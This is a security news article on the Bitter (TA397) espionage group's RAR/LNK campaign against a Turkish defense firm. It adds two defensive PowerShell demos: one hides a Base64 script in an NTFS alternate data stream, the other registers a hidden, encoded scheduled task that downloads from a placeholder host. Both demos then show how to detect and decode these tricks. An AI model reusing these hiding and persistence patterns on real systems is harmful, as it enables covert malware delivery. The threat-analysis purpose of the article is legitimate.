A suspected South Asian cyber espionage group known as Bitter targeted a Turkish defense sector organization in November 2024 to deliver two C++ malware families tracked as WmRAT and MiyaRAT.
“The attack chain used alternate data streams in the RAR archive to deliver a shortcut (LNK) file that created a scheduled task on the target machine to release further payloads,” Proofpoint researchers Nick Atfield, Constantin Klinger, Pim Trouerbach, and David Galazin said in a report shared with The Hacker News.
The security company is tracking the threat under the name TA397. The adversary, which has been active since at least 2013, is also called APT-C-08, APT-Q-37, Hazy Tiger, and Orange Yali.
The group has previously targeted organizations in China, Pakistan, India, Saudi Arabia, and Bangladesh with malware such as BitterRAT, ArtraDownloader, and ZxxZ, indicating a strong Asian focus, according to reports from BlackBerry and Meta in 2019 and 2022, respectively.
Earlier in March of this year, the cyber security company NSFOCUS revealed that an unnamed Chinese government agency was hit by a Bitter phishing attack on February 1, 2024, which delivered a trojan capable of data theft and remote control.
The latest attack chain documented by Proofpoint involved the threat actor using a lure about public infrastructure projects in Madagascar to trick potential victims into opening a booby-trapped RAR archive.
The RAR archive contained a decoy file about the World Bank’s Madagascar Community Infrastructure Development Initiative, a Windows shortcut file disguised as a PDF, and hidden alternate data streams (ADS) that carry the PowerShell code.
ADS is a feature of the New Technology File System (NTFS) used by Windows that lets additional named data streams be attached to a file and read back alongside its main content. Because Explorer and a plain directory listing report only the primary stream, it can be used to smuggle extra data into a file without changing its apparent size or appearance, giving threat actors a way to hide a malicious payload inside the file record of a benign-looking file.
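To make the mechanism concrete, the following PowerShell is an added example written for this page; it is not code from Proofpoint or from the campaign. It builds a throwaway file with a hidden stream in a temporary directory (file name, stream name and payload are all constructed for the demo), shows that the reported size covers only the primary stream, and then enumerates and decodes any non-default stream, which is the same check a responder would run over a suspicious extraction directory.

```powershell
# Added example, not from the Proofpoint report. All paths, names and content
# below are constructed for the demo and carry no real payload.
$demoDir = Join-Path $env:TEMP 'ads-demo'
New-Item -ItemType Directory -Path $demoDir -Force | Out-Null
$decoy = Join-Path $demoDir 'Project_Brief.pdf.lnk'   # hypothetical lure name

# Primary (:$DATA) stream: the only thing Explorer and a plain 'dir' show.
Set-Content -Path $decoy -Value 'benign-looking content' -NoNewline

# Attach a hidden stream holding a Base64/UTF-16LE blob, the encoding that
# powershell.exe -EncodedCommand expects.
$payload = 'Write-Host "hidden stream executed"'
$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
Set-Content -Path $decoy -Stream 'hidden.ps1' -Value $b64 -NoNewline

# Length reports only the primary stream, so the file looks unchanged.
"Reported size: $((Get-Item $decoy).Length) bytes"

# Enumerate every stream; anything beyond :$DATA and the browser-added
# Zone.Identifier mark-of-the-web deserves a look.
function Get-SuspiciousStreams {
    param([string]$Path)
    Get-ChildItem -Path $Path -Recurse -File |
        Get-Item -Stream * -ErrorAction SilentlyContinue |
        Where-Object { $_.Stream -notin ':$DATA', 'Zone.Identifier' } |
        ForEach-Object {
            $content = Get-Content -Path $_.FileName -Stream $_.Stream -Raw
            # Best-effort decode; non-Base64 streams are reported as-is.
            try {
                $decoded = [Text.Encoding]::Unicode.GetString(
                    [Convert]::FromBase64String($content.Trim()))
            } catch { $decoded = '<not base64>' }
            [pscustomobject]@{
                File    = $_.FileName
                Stream  = $_.Stream
                Bytes   = $_.Length
                Decoded = $decoded
            }
        }
}

Get-SuspiciousStreams -Path $demoDir | Format-List
```

The same enumeration is available from cmd.exe with `dir /R`, and streams survive copies only between NTFS volumes; an archiver has to be told explicitly to preserve them (in WinRAR this is the “Save file streams” option, the -os switch), which is worth remembering when reproducing an extraction like the one described above.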
When the victim runs the LNK file, one of the data streams supplies code to retrieve the decoy file hosted on the World Bank website, while the second ADS contains a Base64-encoded PowerShell script that opens the decoy document and sets up a scheduled task to retrieve next-stage payloads from the jacknwoods(.)com domain.
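The persistence step is a scheduled task whose action runs PowerShell with an encoded command, which is also how a defender finds it. The PowerShell below is an added example written for this page, not Proofpoint's code or the actor's: it registers a harmless look-alike task (task name, interval, URL and script are all constructed for the demo and point at a reserved .invalid host), then walks every registered task, flags PowerShell actions, decodes any -EncodedCommand argument for review, and removes the demo task.

```powershell
# Added example, not from the Proofpoint report. Task name, interval, URL and
# script are constructed for the demo; nothing is downloaded.

# 1. Register a harmless task shaped like the pattern described above.
$script  = 'Invoke-WebRequest -Uri "http://example.invalid/next-stage" -OutFile "$env:TEMP\stage.dat"'
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($script))
$action  = New-ScheduledTaskAction -Execute 'powershell.exe' `
             -Argument "-WindowStyle Hidden -NonInteractive -EncodedCommand $encoded"
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) `
             -RepetitionInterval (New-TimeSpan -Minutes 17)   # demo interval
Register-ScheduledTask -TaskName 'DemoEncodedTask' -Action $action `
    -Trigger $trigger -Force | Out-Null

# 2. Enumerate all tasks and decode any encoded PowerShell command.
function Find-EncodedPowerShellTasks {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($act in $task.Actions) {
            $cmd = "$($act.Execute) $($act.Arguments)"
            if ($cmd -notmatch '(?i)powershell|pwsh') { continue }
            $decoded = $null
            # PowerShell accepts any unambiguous prefix of -EncodedCommand;
            # -e, -en, -enc and the full name cover what is seen in practice.
            if ($act.Arguments -match '(?i)-e(?:n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]+)') {
                try {
                    $decoded = [Text.Encoding]::Unicode.GetString(
                        [Convert]::FromBase64String($Matches[1]))
                } catch { $decoded = '<base64 decode failed>' }
            }
            [pscustomobject]@{
                TaskName = $task.TaskName
                Path     = $task.TaskPath
                Author   = $task.Author
                Hidden   = $task.Settings.Hidden
                Command  = $cmd
                Decoded  = $decoded
            }
        }
    }
}

Find-EncodedPowerShellTasks | Format-List

# 3. Remove the demo task.
Unregister-ScheduledTask -TaskName 'DemoEncodedTask' -Confirm:$false
```

The decoded column is what matters: a task whose decoded body reaches out to an unfamiliar domain on a short repeat interval is the pattern to escalate, and the task's Author and registration time from Get-ScheduledTaskInfo help tie it back to the user session that ran the LNK.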
Both WmRAT and MiyaRAT, previously detailed by QiAnXin, come with standard remote access trojan (RAT) capabilities that allow the malware to collect host information, upload or download files, take screenshots, obtain geolocation data, enumerate files and directories, and run arbitrary commands via cmd.exe or PowerShell.
The use of MiyaRAT is believed to be reserved for high-value targets, because it has been selectively deployed against only a few organizations.
“These campaigns are almost certainly intelligence-gathering efforts in support of South Asian government interests,” Proofpoint said. “They aggressively use scheduled tasks to communicate with their intermediate domains to deploy malicious backdoors in targeted organizations to gain access to privileged information and intellectual property.”